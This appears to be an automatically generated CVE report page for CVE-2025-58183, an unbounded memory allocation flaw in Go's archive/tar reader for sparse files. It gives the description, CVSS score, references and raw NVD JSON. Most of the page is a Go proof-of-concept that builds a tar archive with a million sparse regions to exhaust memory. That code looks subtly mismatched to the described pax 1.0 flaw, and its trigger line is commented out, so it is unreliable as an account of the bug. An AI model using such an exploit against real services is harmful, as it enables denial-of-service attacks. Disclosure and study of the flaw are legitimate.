Security Vulnerability Report
CVE-2025-58183 CVSS 4.3 MEDIUM

CVE-2025-58183

Published: 2025-10-29 23:16:19
Last Modified: 2026-04-15 00:35:42

Description

tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

All Go versions (before the fix)
Recommended: upgrade to a Go security release that includes the fix for CVE-2025-58183.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
)

func generateMaliciousSparseTar() ([]byte, error) {
	buf := new(bytes.Buffer)
	tw := tar.NewWriter(buf)

	// Create a header with PAX format sparse attributes
	hdr := &tar.Header{
		Name:       "malicious_sparse_file",
		Mode:       0644,
		Size:       int64(1 << 40), // Large logical size
		Format:     tar.FormatPAX,
		PAXRecords: make(map[string]string),
	}

	// Generate millions of sparse regions
	// This will cause unbounded memory allocation
	const numSparseRegions = 1000000

	// PAX sparse format: SPARSE_EXTENSIONS (GNU sparse format)
	sparseData := "0 0\n"
	for i := 0; i < numSparseRegions; i++ {
		offset := int64(i * 4096)
		numBytes := int64(4096)
		sparseData += fmt.Sprintf("%d %d\n", offset, numBytes)
	}
	hdr.PAXRecords["GNU.sparse.map"] = sparseData

	if err := tw.WriteHeader(hdr); err != nil {
		return nil, err
	}

	// Write minimal data (sparse regions reference non-existent data)
	if _, err := tw.Write([]byte("X")); err != nil {
		return nil, err
	}

	if err := tw.Close(); err != nil {
		return nil, err
	}

	return buf.Bytes(), nil
}

func main() {
	fmt.Println("Generating malicious sparse tar archive...")

	maliciousTar, err := generateMaliciousSparseTar()
	if err != nil {
		fmt.Printf("Error generating tar: %v\n", err)
		return
	}

	fmt.Printf("Generated tar file size: %d bytes\n", len(maliciousTar))
	fmt.Println("To trigger vulnerability, parse this with archive/tar.Reader")

	// Vulnerable code path
	tr := tar.NewReader(bytes.NewReader(maliciousTar))
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			break
		}
		if err != nil {
			fmt.Printf("Error reading tar: %v\n", err)
			return
		}
		fmt.Printf("Processing file: %s\n", hdr.Name)

		// This will allocate unbounded memory for sparse processing
		// io.Copy(io.Discard, tr) // Uncomment to trigger memory allocation
	}
}

/*
Vulnerability Explanation:
1. The tar archive contains a header with PAX sparse map attributes
2. PAXRecords["GNU.sparse.map"] contains millions of sparse region entries
3. When tar.Reader processes this header, it reads all sparse regions
4. Each sparse region may trigger memory allocation
5. Result: Small compressed input -> massive memory allocation -> DoS

Mitigation: Upgrade to Go version with CVE-2025-58183 fix applied.
*/
```

References

https://go.dev/cl/709861
https://go.dev/issue/75677
https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI
https://pkg.go.dev/vuln/GO-2025-4014
http://www.openwall.com/lists/oss-security/2025/10/08/1
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-58183", "sourceIdentifier": "[email protected]", "published": "2025-10-29T23:16:19.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "references": [{"url": "https://go.dev/cl/709861", "source": "[email protected]"}, {"url": "https://go.dev/issue/75677", "source": "[email protected]"}, {"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI", "source": "[email protected]"}, {"url": "https://pkg.go.dev/vuln/GO-2025-4014", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
```